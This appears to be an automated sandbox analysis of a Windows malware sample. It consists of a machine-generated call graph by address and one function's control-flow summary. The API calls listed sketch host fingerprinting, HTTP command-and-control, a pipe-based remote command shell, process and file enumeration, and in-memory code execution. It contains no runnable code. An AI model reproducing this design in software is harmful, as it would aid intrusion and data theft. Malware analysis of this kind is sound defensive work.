GetExitCodeThread 3711->3715 3712 89db388 NtAllocateVirtualMemory 3712->3715 3714 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3714->3715 3715->3681 3715->3683 3715->3684 3715->3685 3715->3686 3715->3687 3715->3690 3715->3693 3715->3695 3715->3698 3715->3700 3715->3705 3715->3706 3715->3708 3715->3709 3715->3711 3715->3712 3715->3714 3788 89d6cfc 3715->3788 3792 89d5734 3715->3792 3717 89d54bc 3716->3717 3718 89db388 NtAllocateVirtualMemory 3717->3718 3719 89d54e2 3718->3719 3720 89db388 NtAllocateVirtualMemory 3719->3720 3721 89d54f8 InternetCrackUrlA 3720->3721 3722 89d5554 3721->3722 3723 89d556e 3721->3723 3724 89d82b4 NtFreeVirtualMemory 3722->3724 3723->3706 3725 89d5561 3724->3725 3726 89d82b4 NtFreeVirtualMemory 3725->3726 3726->3723 3728 89db388 NtAllocateVirtualMemory 3727->3728 3729 89d8452 3728->3729 3730 89d8466 GetAdaptersInfo 3729->3730 3741 89d845f 3729->3741 3731 89d848d 3730->3731 3733 89d865b 3730->3733 3732 89db388 NtAllocateVirtualMemory 3731->3732 3735 89d8498 GetAdaptersInfo 3732->3735 3734 89d8688 3733->3734 3736 89d82b4 NtFreeVirtualMemory 3733->3736 3737 89db388 NtAllocateVirtualMemory 3734->3737 3738 89d84c5 3735->3738 3736->3734 3739 89d869b 3737->3739 3743 89d84e6 wsprintfA 3738->3743 3740 89d86ac GetComputerNameExA 3739->3740 3739->3741 3742 89d8729 GetComputerNameExA 3740->3742 3746 89d86c5 3740->3746 3741->3706 3744 89d87db 3742->3744 3747 89d8746 3742->3747 3750 89d8502 3743->3750 3745 89d82b4 NtFreeVirtualMemory 3744->3745 3745->3741 3748 89d86fa wsprintfA 3746->3748 3749 89d87a6 wsprintfA 3747->3749 3748->3742 3749->3744 3750->3733 3751 89d8627 wsprintfA 3750->3751 3752 89d85b2 wsprintfA 3750->3752 3751->3733 3751->3750 3752->3750 3754 89db7aa 3753->3754 3755 89db7b5 3754->3755 3756 89db7f0 3754->3756 3802 89dc00c 3754->3802 3755->3715 3758 89dc00c NtAllocateVirtualMemory 3756->3758 3759 89db822 3756->3759 3758->3759 3759->3755 3760 89dc00c NtAllocateVirtualMemory 3759->3760 3760->3755 3762 89d6fd5 3761->3762 3764 89d6fe6 3761->3764 3763 89db388 NtAllocateVirtualMemory 3762->3763 3762->3764 3763->3764 3764->3706 3767 89d4e5d 3765->3767 3766 89d5484 3 API calls 3766->3767 3767->3766 3771 89d4ec6 3767->3771 3772 89d4fc6 3767->3772 3778 89d82b4 NtFreeVirtualMemory 3767->3778 3779 89d5022 3767->3779 3805 89d5078 3767->3805 3810 89d5160 3767->3810 3768 89d4d78 InternetOpenW InternetConnectA 3768->3771 3769 89d82b4 NtFreeVirtualMemory 3769->3771 3770 89dbfc0 NtAllocateVirtualMemory 3770->3771 3771->3767 3771->3768 3771->3769 3771->3770 3771->3772 3774 89d504c InternetCloseHandle 3772->3774 3775 89d5057 3772->3775 3774->3775 3776 89d505f InternetCloseHandle 3775->3776 3777 89d506a 3775->3777 3776->3777 3777->3715 3778->3767 3779->3772 3781->3677 3783 89db470 3782->3783 3784 89d8bef GetCursorPos 3783->3784 3785 89d8bfe 3784->3785 3786 89d8c02 GetTickCount 3784->3786 3785->3706 3834 89db620 RtlRandom 3786->3834 3789 89d6d12 3788->3789 3790 89db388 NtAllocateVirtualMemory 3789->3790 3791 89d6d2f 3789->3791 3790->3791 3791->3715 3793 89d5792 3792->3793 3794 89dbfc0 NtAllocateVirtualMemory 3793->3794 3796 89d57b3 3794->3796 3795 89d57c0 3795->3715 3796->3795 3798 89d5a49 3796->3798 3835 89dcf4c 3796->3835 3841 89dcde8 3796->3841 3851 89d44c8 3796->3851 3799 89d82b4 NtFreeVirtualMemory 3798->3799 3799->3795 3803 89db388 NtAllocateVirtualMemory 3802->3803 3804 89dc034 3803->3804 3804->3756 3806 89d50bc InternetReadFile 3805->3806 3807 89d5104 3806->3807 3808 89d50de 3806->3808 3807->3771 3808->3806 3808->3807 3809 89db704 3 API calls 3808->3809 3809->3808 3811 89db388 NtAllocateVirtualMemory 3810->3811 3812 89d51ab 3811->3812 3813 89dbe64 3 API calls 3812->3813 3815 89d5204 3813->3815 3814 89d5265 3816 89d5292 3814->3816 3817 89d5315 3814->3817 3815->3814 3818 89dbe64 3 API calls 3815->3818 3819 89d52c7 HttpOpenRequestA 3816->3819 3820 89d5350 HttpOpenRequestA 3817->3820 3821 89d5253 3818->3821 3822 89d539c 3819->3822 3820->3822 3821->3814 3823 89dbe64 3 API calls 3821->3823 3824 89d53a4 3822->3824 3825 89d53d6 3822->3825 3826 89d53b3 InternetSetOptionA 3822->3826 3823->3814 3828 89d5479 3824->3828 3830 89d82b4 NtFreeVirtualMemory 3824->3830 3827 89d5424 HttpSendRequestA 3825->3827 3831 89d53e0 3825->3831 3826->3825 3829 89d5443 3827->3829 3828->3767 3829->3824 3832 89d82b4 NtFreeVirtualMemory 3829->3832 3830->3828 3833 89d53fb HttpSendRequestA 3831->3833 3832->3824 3833->3829 3834->3785 3836 89dcf5a 3835->3836 3840 89dcf5c 3835->3840 3836->3796 3837 89dcfaa 3838 89d82b4 NtFreeVirtualMemory 3837->3838 3838->3836 3839 89d82b4 NtFreeVirtualMemory 3839->3840 3840->3837 3840->3839 3843 89dce04 3841->3843 3842 89db388 NtAllocateVirtualMemory 3845 89dce6b 3842->3845 3843->3842 3844 89dce3b 3843->3844 3844->3796 3845->3844 3846 89dbfc0 NtAllocateVirtualMemory 3845->3846 3847 89dce9d 3846->3847 3848 89db388 NtAllocateVirtualMemory 3847->3848 3849 89dcebc 3848->3849 3849->3844 3850 89d82b4 NtFreeVirtualMemory 3849->3850 3850->3844 3886 89d44ec 3851->3886 3852 89d4799 3856 89d47a4 3852->3856 3857 89d4852 3852->3857 3853 89d47e3 3854 89d47ee 3853->3854 3855 89d4900 3853->3855 3866 89d49ec 3854->3866 3867 89d480f 3854->3867 3879 89d47de 3854->3879 3914 89d4334 3855->3914 3859 89d494c 3856->3859 3860 89d47af 3856->3860 3865 89dbfc0 NtAllocateVirtualMemory 3857->3865 3968 89d2b28 3859->3968 3863 89d47ba 3860->3863 3864 89d4931 3860->3864 3862 89d4905 3862->3879 3919 89dc704 NtDelayExecution 3862->3919 3868 89d47c5 3863->3868 3869 89d4942 3863->3869 3935 89d2d50 CreateToolhelp32Snapshot 3864->3935 3887 89d4870 3865->3887 3988 89d7dfc 3866->3988 3872 89d49f8 3867->3872 3873 89d481a 3867->3873 3876 89d47cc 3868->3876 3877 89d483e 3868->3877 3967 89d321c CreateThread 3869->3967 3872->3879 3999 89d7f54 3872->3999 3873->3879 4012 89d4a20 3873->4012 3880 89d491d 3876->3880 3881 89d47d7 3876->3881 3902 89d7940 3877->3902 3879->3796 3920 89d7768 3880->3920 3881->3879 3889 89d7c98 3881->3889 3886->3852 3886->3853 3887->3879 3888 89d82b4 NtFreeVirtualMemory 3887->3888 3888->3879 3890 89d7cb7 3889->3890 3891 89d7cc4 MultiByteToWideChar 3890->3891 4020 89d7a84 3891->4020 3894 89d7ddf 3895 89d82b4 NtFreeVirtualMemory 3894->3895 3901 89d7dd8 3894->3901 3895->3901 3896 89d7d4b VirtualAlloc 3897 89d7d7e 3896->3897 3898 89db388 NtAllocateVirtualMemory 3897->3898 3899 89d7d88 CreateThread 3898->3899 3900 89d82b4 NtFreeVirtualMemory 3899->3900 3900->3901 3901->3879 4109 89d830c 3902->4109 3904 89d7963 3905 89d8bdc 3 API calls 3904->3905 3912 89d7970 3904->3912 3906 89d79ba wsprintfW 3905->3906 3907 89d82b4 NtFreeVirtualMemory 3906->3907 3908 89d79df 3907->3908 3909 89d7a07 MultiByteToWideChar 3908->3909 3910 89d7a84 21 API calls 3909->3910 3911 89d7a4f 3910->3911 3911->3912 4117 89db8d4 3911->4117 3912->3879 3915 89d434a SetEvent 3914->3915 3916 89d4357 3914->3916 3915->3916 3917 89d437b 3916->3917 3918 89d4361 ReleaseMutex CloseHandle 3916->3918 3917->3862 3918->3917 3919->3862 3921 89d77a7 3920->3921 3922 89d830c 4 API calls 3921->3922 3924 89d77d3 3922->3924 3923 89d77e0 3923->3879 3924->3923 3925 89d8bdc 3 API calls 3924->3925 3926 89d782a wsprintfW 3925->3926 3927 89d82b4 NtFreeVirtualMemory 3926->3927 3928 89d784f 3927->3928 3929 89d7874 MultiByteToWideChar 3928->3929 3930 89d7a84 21 API calls 3929->3930 3931 89d78b9 3930->3931 3932 89d78d9 MultiByteToWideChar 3931->3932 3932->3923 3933 89d790d 3932->3933 3933->3923 4122 89db9a0 3933->4122 3936 89db388 NtAllocateVirtualMemory 3935->3936 3937 89d2d94 3936->3937 3938 89dbe64 3 API calls 3937->3938 3939 89d2ddd 3938->3939 3940 89d2de9 Process32First 3939->3940 3941 89d31fb 3939->3941 3942 89d2e34 3940->3942 3943 89d2e13 Process32Next 3940->3943 3944 89dbe64 3 API calls 3941->3944 3946 89db388 NtAllocateVirtualMemory 3942->3946 3943->3942 3943->3943 3945 89d320c 3944->3945 3945->3879 3947 89d2e44 Process32First 3946->3947 3948 89d2ead Process32First 3947->3948 3949 89d2e60 3947->3949 3951 89d31e6 3948->3951 3955 89d2ec8 3948->3955 3950 89d2e68 Process32Next 3949->3950 3950->3948 3950->3950 3952 89d82b4 NtFreeVirtualMemory 3951->3952 3953 89d31f0 CloseHandle 3952->3953 3953->3941 3954 89d31cb Process32Next 3954->3951 3954->3955 3955->3954 3956 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3955->3956 3957 89d2fe0 wsprintfA 3955->3957 3956->3955 3958 89dbe64 3 API calls 3957->3958 3960 89d300d 3958->3960 3959 89dbe64 3 API calls 3959->3960 3960->3959 3961 89d3086 wsprintfA 3960->3961 3962 89dbe64 3 API calls 3961->3962 3965 89d30b3 3962->3965 3964 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3964->3965 3965->3964 3966 89dbe64 3 API calls 3965->3966 4131 89d260c CreateToolhelp32Snapshot 3965->4131 3966->3954 3967->3879 3969 89db388 NtAllocateVirtualMemory 3968->3969 3970 89d2b3b 3969->3970 3971 89dbe64 3 API calls 3970->3971 3972 89d2b7b 3971->3972 4147 89d8398 3972->4147 3974 89d2cf3 3975 89d82b4 NtFreeVirtualMemory 3974->3975 3977 89d2d05 3974->3977 3975->3977 3976 89d2b8e 3976->3974 3978 89dbe64 3 API calls 3976->3978 3979 89dbe64 3 API calls 3977->3979 3980 89d2bda FindFirstFileA 3978->3980 3981 89d2d40 3979->3981 3980->3974 3987 89d2bfe 3980->3987 3981->3879 3982 89d2ccd FindNextFileA 3983 89d2ce8 FindClose 3982->3983 3982->3987 3983->3974 3984 89dbe64 3 API calls 3984->3987 3985 89d2c98 wsprintfA 3986 89dbe64 3 API calls 3985->3986 3986->3987 3987->3982 3987->3984 3987->3985 3989 89d7e17 3988->3989 3990 89d7e24 MultiByteToWideChar 3989->3990 3991 89d7a84 21 API calls 3990->3991 3993 89d7e75 3991->3993 3992 89d7f40 3992->3879 3993->3992 3994 89db388 NtAllocateVirtualMemory 3993->3994 3995 89d7eb6 3994->3995 3996 89db388 NtAllocateVirtualMemory 3995->3996 3997 89d7ed9 CreateThread 3996->3997 3998 89d82b4 NtFreeVirtualMemory 3997->3998 3998->3992 4000 89d7f6f 3999->4000 4001 89d7f7c MultiByteToWideChar 4000->4001 4002 89d7a84 21 API calls 4001->4002 4004 89d7fcd 4002->4004 4003 89d80a4 4003->3879 4004->4003 4005 89db388 NtAllocateVirtualMemory 4004->4005 4006 89d800e 4005->4006 4155 89dc7dc 4006->4155 4009 89db388 NtAllocateVirtualMemory 4010 89d803d CreateThread 4009->4010 4011 89d82b4 NtFreeVirtualMemory 4010->4011 4011->4003 4017 89d4a2c 4012->4017 4013 89d4acc 4013->3879 4014 89d4aec MultiByteToWideChar 4015 89d830c 4 API calls 4014->4015 4015->4017 4016 89d4b7d MultiByteToWideChar 4016->4017 4017->4013 4017->4014 4017->4016 4018 89d4bd6 wsprintfW 4017->4018 4019 89d7a84 21 API calls 4018->4019 4019->4017 4029 89d7ac4 4020->4029 4022 89d7b28 4023 89d7c5d 4022->4023 4024 89d82b4 NtFreeVirtualMemory 4022->4024 4025 89d7c68 4023->4025 4026 89d82b4 NtFreeVirtualMemory 4023->4026 4024->4023 4025->3894 4025->3896 4026->4025 4027 89dc00c NtAllocateVirtualMemory 4027->4029 4029->4022 4029->4027 4031 89d900c 4029->4031 4051 89d76d8 4029->4051 4063 89d8240 4029->4063 4032 89d904b InternetOpenW 4031->4032 4033 89d908b 4032->4033 4034 89d9086 4032->4034 4069 89d55dc 4033->4069 4036 89d923d InternetCloseHandle 4034->4036 4037 89d9248 4034->4037 4036->4037 4039 89d925b 4037->4039 4040 89d9250 InternetCloseHandle 4037->4040 4039->4029 4040->4039 4041 89d90f4 4043 89d9106 4041->4043 4044 89d82b4 NtFreeVirtualMemory 4041->4044 4045 89d9118 InternetOpenUrlW 4043->4045 4046 89d82b4 NtFreeVirtualMemory 4043->4046 4044->4043 4045->4034 4048 89d9154 4045->4048 4046->4045 4047 89d915f InternetReadFile 4047->4048 4048->4034 4048->4047 4049 89db648 3 API calls 4048->4049 4050 89db388 NtAllocateVirtualMemory 4048->4050 4049->4048 4050->4048 4091 89d92f8 4051->4091 4056 89d774e 4058 89d76fb 4056->4058 4060 89d82b4 NtFreeVirtualMemory 4056->4060 4057 89dbf78 3 API calls 4059 89d7729 4057->4059 4058->4029 4059->4056 4061 89d772d 4059->4061 4060->4058 4062 89d82b4 NtFreeVirtualMemory 4061->4062 4062->4058 4103 89d80b8 4063->4103 4066 89d827f 4066->4029 4070 89d5614 4069->4070 4071 89db388 NtAllocateVirtualMemory 4070->4071 4072 89d563a 4071->4072 4073 89db388 NtAllocateVirtualMemory 4072->4073 4074 89d5650 InternetCrackUrlW 4073->4074 4075 89d56ac 4074->4075 4076 89d56c6 4074->4076 4077 89d82b4 NtFreeVirtualMemory 4075->4077 4076->4034 4076->4041 4080 89dc860 4076->4080 4078 89d56b9 4077->4078 4079 89d82b4 NtFreeVirtualMemory 4078->4079 4079->4076 4081 89dc8df 4080->4081 4082 89dc894 InternetConnectW 4080->4082 4083 89dc9d5 InternetCloseHandle 4081->4083 4084 89dc9e0 4081->4084 4082->4081 4085 89dc8e4 HttpOpenRequestW 4082->4085 4083->4084 4087 89dc9e8 InternetCloseHandle 4084->4087 4088 89dc9f3 4084->4088 4085->4081 4086 89dc936 HttpSendRequestW 4085->4086 4089 89dc955 InternetQueryOptionW InternetSetOptionW 4086->4089 4090 89dc9a7 HttpSendRequestW 4086->4090 4087->4088 4088->4041 4089->4090 4090->4081 4092 89dc00c NtAllocateVirtualMemory 4091->4092 4094 89d9318 4092->4094 4093 89d76f7 4093->4058 4096 89dbf78 4093->4096 4094->4093 4095 89d82b4 NtFreeVirtualMemory 4094->4095 4095->4093 4097 89dbf90 4096->4097 4100 89dbf0c 4097->4100 4099 89d7713 4099->4056 4099->4057 4101 89db704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4100->4101 4102 89dbf40 4101->4102 4102->4099 4104 89d80f9 4103->4104 4105 89d810b RtlInitUnicodeString NtCreateFile 4104->4105 4106 89d81b1 4105->4106 4106->4066 4107 89d81c8 NtWriteFile 4106->4107 4108 89d8230 NtClose 4107->4108 4108->4066 4110 89db470 4109->4110 4111 89d8326 SHGetFolderPathW 4110->4111 4112 89d834f 4111->4112 4113 89dc00c NtAllocateVirtualMemory 4112->4113 4115 89d835b 4113->4115 4114 89d8368 4114->3904 4115->4114 4116 89dbf78 3 API calls 4115->4116 4116->4114 4118 89db8ee 4117->4118 4119 89db926 CreateProcessW 4118->4119 4120 89db97a CloseHandle CloseHandle 4119->4120 4121 89db976 4119->4121 4120->4121 4121->3912 4123 89db9c0 4122->4123 4124 89dba78 4123->4124 4125 89dba1e 4123->4125 4127 89dbaad wsprintfW 4124->4127 4126 89dba53 wsprintfW 4125->4126 4128 89dbac8 CreateProcessW 4126->4128 4127->4128 4129 89dbb1f CloseHandle CloseHandle 4128->4129 4130 89dbb1b 4128->4130 4129->4130 4130->3923 4132 89d297e 4131->4132 4133 89d2659 Process32First 4131->4133 4132->3965 4133->4132 4136 89d267f 4133->4136 4134 89d2963 Process32Next 4134->4132 4134->4136 4135 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4135->4136 4136->4134 4136->4135 4137 89d279f wsprintfA 4136->4137 4138 89dbe64 3 API calls 4137->4138 4140 89d27cf 4138->4140 4139 89dbe64 3 API calls 4139->4140 4140->4139 4141 89d2839 wsprintfA 4140->4141 4142 89dbe64 3 API calls 4141->4142 4145 89d2869 4142->4145 4143 89d260c 3 API calls 4143->4145 4144 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4144->4145 4145->4143 4145->4144 4146 89dbe64 3 API calls 4145->4146 4146->4134 4148 89db470 4147->4148 4149 89d83b2 SHGetFolderPathA 4148->4149 4150 89d83db 4149->4150 4151 89dbfc0 NtAllocateVirtualMemory 4150->4151 4153 89d83e7 4151->4153 4152 89d83f4 4152->3976 4153->4152 4154 89dbe64 3 API calls 4153->4154 4154->4152 4156 89d8033 4155->4156 4157 89dc7ef 4155->4157 4156->4009 4158 89db388 NtAllocateVirtualMemory 4157->4158 4158->4156 4160 89d4411 4159->4160 4161 89dbfc0 NtAllocateVirtualMemory 4160->4161 4165 89d4444 4161->4165 4162 89d4451 4163 89d44a4 4164 89d82b4 NtFreeVirtualMemory 4163->4164 4164->4162 4165->4162 4165->4163 4166 89d448f MessageBoxA 4165->4166 4166->4163 4167 89d4384 4168 89d43a7 4167->4168 4169 89d43a5 4167->4169 4171 89d43c4 4168->4171 4172 89d41b4 129 API calls 4171->4172 4173 89d43cd 4172->4173 4174 89d43eb 4173->4174 4176 89dc704 NtDelayExecution 4173->4176 4174->4169 4176->4173 4177 89d3304 4178 89d3349 4177->4178 4235 89d3322 4177->4235 4179 89db388 NtAllocateVirtualMemory 4178->4179 4180 89d3353 4179->4180 4180->4235 4295 89d2164 4180->4295 4182 89d3406 4183 89d2164 21 API calls 4182->4183 4184 89d349e 4183->4184 4185 89d2164 21 API calls 4184->4185 4186 89d3537 4185->4186 4187 89d2164 21 API calls 4186->4187 4188 89d35d0 4187->4188 4189 89d2164 21 API calls 4188->4189 4190 89d3669 4189->4190 4191 89d2164 21 API calls 4190->4191 4192 89d3702 4191->4192 4193 89d2164 21 API calls 4192->4193 4194 89d379b 4193->4194 4195 89d2164 21 API calls 4194->4195 4196 89d3834 4195->4196 4197 89d2164 21 API calls 4196->4197 4198 89d38cd 4197->4198 4199 89d2164 21 API calls 4198->4199 4200 89d3966 4199->4200 4201 89d2164 21 API calls 4200->4201 4202 89d39ff 4201->4202 4203 89db388 NtAllocateVirtualMemory 4202->4203 4204 89d3a12 4203->4204 4205 89d6fc0 NtAllocateVirtualMemory 4204->4205 4206 89d3ad6 4204->4206 4204->4235 4213 89d3a63 4205->4213 4207 89d3b77 4206->4207 4208 89d6fc0 NtAllocateVirtualMemory 4206->4208 4209 89d3c18 4207->4209 4210 89d6fc0 NtAllocateVirtualMemory 4207->4210 4217 89d3b04 4208->4217 4211 89d3cb9 4209->4211 4212 89d6fc0 NtAllocateVirtualMemory 4209->4212 4221 89d3ba5 4210->4221 4214 89d6fc0 NtAllocateVirtualMemory 4211->4214 4215 89d3d5a 4211->4215 4223 89d3c46 4212->4223 4213->4206 4226 89dbe64 3 API calls 4213->4226 4230 89d3ce7 4214->4230 4216 89d6fc0 NtAllocateVirtualMemory 4215->4216 4218 89d3dfb 4215->4218 4233 89d3d88 4216->4233 4217->4207 4229 89dbe64 3 API calls 4217->4229 4219 89d3e9c 4218->4219 4220 89d6fc0 NtAllocateVirtualMemory 4218->4220 4222 89d6fc0 NtAllocateVirtualMemory 4219->4222 4225 89d3f3d 4219->4225 4243 89d3e29 4220->4243 4221->4209 4238 89dbe64 3 API calls 4221->4238 4246 89d3eca 4222->4246 4223->4211 4240 89dbe64 3 API calls 4223->4240 4224 89d4138 4317 89d2988 4224->4317 4227 89d3fde 4225->4227 4231 89d6fc0 NtAllocateVirtualMemory 4225->4231 4232 89d3abd 4226->4232 4234 89d6fc0 NtAllocateVirtualMemory 4227->4234 4237 89d408b 4227->4237 4236 89d3b5e 4229->4236 4230->4215 4249 89dbe64 3 API calls 4230->4249 4255 89d3f6b 4231->4255 4239 89dbe64 3 API calls 4232->4239 4233->4218 4252 89dbe64 3 API calls 4233->4252 4258 89d400c 4234->4258 4241 89dbe64 3 API calls 4236->4241 4237->4224 4242 89d6fc0 NtAllocateVirtualMemory 4237->4242 4244 89d3bff 4238->4244 4245 89d3acc 4239->4245 4247 89d3ca0 4240->4247 4248 89d3b6d 4241->4248 4267 89d40b9 4242->4267 4243->4219 4261 89dbe64 3 API calls 4243->4261 4250 89dbe64 3 API calls 4244->4250 4251 89d82b4 NtFreeVirtualMemory 4245->4251 4246->4225 4264 89dbe64 3 API calls 4246->4264 4253 89dbe64 3 API calls 4247->4253 4254 89d82b4 NtFreeVirtualMemory 4248->4254 4256 89d3d41 4249->4256 4257 89d3c0e 4250->4257 4251->4206 4259 89d3de2 4252->4259 4260 89d3caf 4253->4260 4254->4207 4255->4227 4272 89dbe64 3 API calls 4255->4272 4262 89dbe64 3 API calls 4256->4262 4263 89d82b4 NtFreeVirtualMemory 4257->4263 4258->4237 4275 89dbe64 3 API calls 4258->4275 4265 89dbe64 3 API calls 4259->4265 4266 89d82b4 NtFreeVirtualMemory 4260->4266 4268 89d3e83 4261->4268 4269 89d3d50 4262->4269 4263->4209 4270 89d3f24 4264->4270 4271 89d3df1 4265->4271 4266->4211 4267->4224 4282 89dbe64 3 API calls 4267->4282 4273 89dbe64 3 API calls 4268->4273 4274 89d82b4 NtFreeVirtualMemory 4269->4274 4276 89dbe64 3 API calls 4270->4276 4277 89d82b4 NtFreeVirtualMemory 4271->4277 4278 89d3fc5 4272->4278 4279 89d3e92 4273->4279 4274->4215 4280 89d406c 4275->4280 4281 89d3f33 4276->4281 4277->4218 4283 89dbe64 3 API calls 4278->4283 4284 89d82b4 NtFreeVirtualMemory 4279->4284 4285 89dbe64 3 API calls 4280->4285 4286 89d82b4 NtFreeVirtualMemory 4281->4286 4287 89d4119 4282->4287 4288 89d3fd4 4283->4288 4284->4219 4291 89d407e 4285->4291 4286->4225 4289 89dbe64 3 API calls 4287->4289 4290 89d82b4 NtFreeVirtualMemory 4288->4290 4292 89d412b 4289->4292 4290->4227 4293 89d82b4 NtFreeVirtualMemory 4291->4293 4294 89d82b4 NtFreeVirtualMemory 4292->4294 4293->4237 4294->4224 4296 89d21e4 4295->4296 4297 89d21f6 6 API calls 4296->4297 4343 89d2134 4297->4343 4299 89d2333 CreateProcessW 4300 89db388 NtAllocateVirtualMemory 4299->4300 4301 89d2399 4300->4301 4302 89db388 NtAllocateVirtualMemory 4301->4302 4311 89d23d6 4302->4311 4303 89d25e8 4306 89d25fa 4303->4306 4308 89d82b4 NtFreeVirtualMemory 4303->4308 4304 89d2401 PeekNamedPipe 4307 89d24b9 PeekNamedPipe 4304->4307 4304->4311 4305 89d25a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4305->4303 4306->4182 4309 89d2569 GetExitCodeProcess 4307->4309 4307->4311 4308->4306 4310 89d258f 4309->4310 4309->4311 4310->4305 4311->4303 4311->4304 4311->4305 4311->4307 4311->4309 4313 89d2468 ReadFile 4311->4313 4315 89d2518 ReadFile 4311->4315 4344 89dc704 NtDelayExecution 4311->4344 4314 89dbe64 3 API calls 4313->4314 4314->4307 4316 89dbe64 3 API calls 4315->4316 4316->4309 4318 89d299d 4317->4318 4342 89d2b17 4317->4342 4319 89d29ca 4318->4319 4320 89d82b4 NtFreeVirtualMemory 4318->4320 4318->4342 4321 89d82b4 NtFreeVirtualMemory 4319->4321 4322 89d29ea 4319->4322 4320->4319 4321->4322 4323 89d2a0a 4322->4323 4324 89d82b4 NtFreeVirtualMemory 4322->4324 4325 89d2a2a 4323->4325 4326 89d82b4 NtFreeVirtualMemory 4323->4326 4324->4323 4327 89d2a4a 4325->4327 4328 89d82b4 NtFreeVirtualMemory 4325->4328 4326->4325 4329 89d2a6a 4327->4329 4330 89d82b4 NtFreeVirtualMemory 4327->4330 4328->4327 4331 89d2a8a 4329->4331 4332 89d82b4 NtFreeVirtualMemory 4329->4332 4330->4329 4333 89d2aaa 4331->4333 4334 89d82b4 NtFreeVirtualMemory 4331->4334 4332->4331 4335 89d2aca 4333->4335 4336 89d82b4 NtFreeVirtualMemory 4333->4336 4334->4333 4337 89d2aea 4335->4337 4339 89d82b4 NtFreeVirtualMemory 4335->4339 4336->4335 4338 89d2b0a 4337->4338 4340 89d82b4 NtFreeVirtualMemory 4337->4340 4341 89d82b4 NtFreeVirtualMemory 4338->4341 4339->4337 4340->4338 4341->4342 4342->4235 4343->4299 4344->4311 4378 89dbb44 4379 89dbbc5 4378->4379 4380 89dbb62 4378->4380 4381 89dbb8e CreateFileMappingA 4380->4381 4381->4379 4382 89dbbcc MapViewOfFile 4381->4382 4382->4379 4384 89dbbff 4382->4384 4383 89dbcd5 VirtualFree 4385 89d82b4 NtFreeVirtualMemory 4383->4385 4384->4383 4387 89db388 NtAllocateVirtualMemory 4384->4387 4386 89dbd06 UnmapViewOfFile CloseHandle 4385->4386 4386->4379 4388 89dbc35 4387->4388 4389 89dbe64 3 API calls 4388->4389 4390 89dbc87 4389->4390 4391 89dbe64 3 API calls 4390->4391 4392 89dbc99 4391->4392 4393 89dbfc0 NtAllocateVirtualMemory 4392->4393 4394 89dbcaf 4393->4394 4395 89d82b4 NtFreeVirtualMemory 4394->4395 4396 89dbccb 4395->4396 4397 89d82b4 NtFreeVirtualMemory 4396->4397 4397->4383 4398 89dc5c0 4399 89dc5de 4398->4399 4402 89dc641 4398->4402 4400 89dc60a CreateFileMappingA 4399->4400 4401 89dc648 MapViewOfFile 4400->4401 4400->4402 4401->4402 4403 89dc67b 4401->4403 4408 89dca9c 4403->4408 4406 89d82b4 NtFreeVirtualMemory 4407 89dc6d1 UnmapViewOfFile CloseHandle 4406->4407 4407->4402 4409 89dcaad 4408->4409 4410 89dc6a0 VirtualFree 4408->4410 4414 89dca68 4409->4414 4410->4406 4413 89d82b4 NtFreeVirtualMemory 4413->4410 4415 89dca7d 4414->4415 4416 89dca8b 4414->4416 4417 89dca68 NtFreeVirtualMemory 4415->4417 4418 89d82b4 NtFreeVirtualMemory 4416->4418 4417->4416 4419 89dca95 4418->4419 4419->4413

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 089D8424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 89d8424-89d845d call 89db388 3 89d845f-89d8461 0->3 4 89d8466-89d8487 GetAdaptersInfo 0->4 5 89d87ea-89d87f1 3->5 6 89d848d-89d84c0 call 89db388 GetAdaptersInfo call 89db4cc 4->6 7 89d8676-89d867c 4->7 16 89d84c5-89d84c8 6->16 9 89d867e-89d8683 call 89d82b4 7->9 10 89d8688-89d86a6 call 89db388 7->10 9->10 17 89d86ac-89d86c3 GetComputerNameExA 10->17 18 89d87e5 10->18 19 89d84d9-89d84e1 16->19 20 89d84ca-89d84d7 16->20 21 89d8729-89d8740 GetComputerNameExA 17->21 22 89d86c5-89d86dc call 89db4cc 17->22 18->5 23 89d84e6-89d84fe wsprintfA 19->23 20->23 25 89d87db-89d87e0 call 89d82b4 21->25 26 89d8746-89d874b 21->26 34 89d86ed-89d86f5 22->34 35 89d86de-89d86eb 22->35 27 89d8502-89d850a 23->27 25->18 30 89d874d-89d875a 26->30 31 89d875c-89d8763 26->31 33 89d8516-89d8525 27->33 32 89d876b-89d8782 call 89db4cc 30->32 31->32 45 89d8784-89d8794 32->45 46 89d8796-89d879e 32->46 37 89d852b-89d8530 33->37 38 89d85f2-89d8609 call 89db4cc 33->38 39 89d86fa-89d8725 wsprintfA 34->39 35->39 42 89d8573-89d858a call 89db4cc 37->42 43 89d8532-89d8549 call 89db4cc 37->43 51 89d860b-89d8618 38->51 52 89d861a-89d8622 38->52 39->21 54 89d858c-89d8599 42->54 55 89d859b-89d85a3 42->55 57 89d854b-89d8558 43->57 58 89d855a-89d8562 43->58 50 89d87a6-89d87d7 wsprintfA 45->50 46->50 50->25 56 89d8627-89d8659 wsprintfA 51->56 52->56 60 89d85a8-89d85ad 54->60 55->60 61 89d865d-89d8670 56->61 62 89d865b 56->62 59 89d8567-89d8571 57->59 58->59 63 89d85b2-89d85ed wsprintfA 59->63 60->63 61->7 61->27 62->7 63->33
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D8470
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D84A7
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 089D84F0
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 089D85DB
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 089D863F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
